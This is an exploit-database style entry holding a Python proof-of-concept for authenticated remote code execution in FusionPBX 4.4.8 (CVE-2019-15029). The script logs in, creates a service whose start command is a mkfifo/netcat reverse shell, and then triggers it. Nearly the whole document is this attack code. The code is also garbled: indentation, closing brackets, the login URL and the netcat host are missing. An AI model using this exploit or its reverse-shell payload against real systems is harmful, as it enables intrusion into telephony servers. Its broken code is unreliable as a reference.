FusionPBX 4.4.8 Remote Code Execution

FusionPBX version 4.4.8 remote code execution exploit.

MD5 | 0c516823852522b8ca82abb6defe813b


# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) != 6:
print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
print("[~] ./exploit.py http://example.com admin p@$$word 1337")


url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

request = requests.session()

login_info = {
"username": username,
"password": password

login_request = request.post(
login_info, verify=False

if "Invalid Username and/or Password" not in login_request.text:
print("[+] Logged in successfully")
print("[+] Error with creds")

service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
# the service name you want to create

# this value contains the payload , you can change it as you want
"service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 1337 >/tmp/z",

request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)

soup = BeautifulSoup(html_page.text, "lxml")

for a in soup.find_all(href=True):
if "PwnedService3" in a:
sid = a["href"].split("=")[1]

service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)

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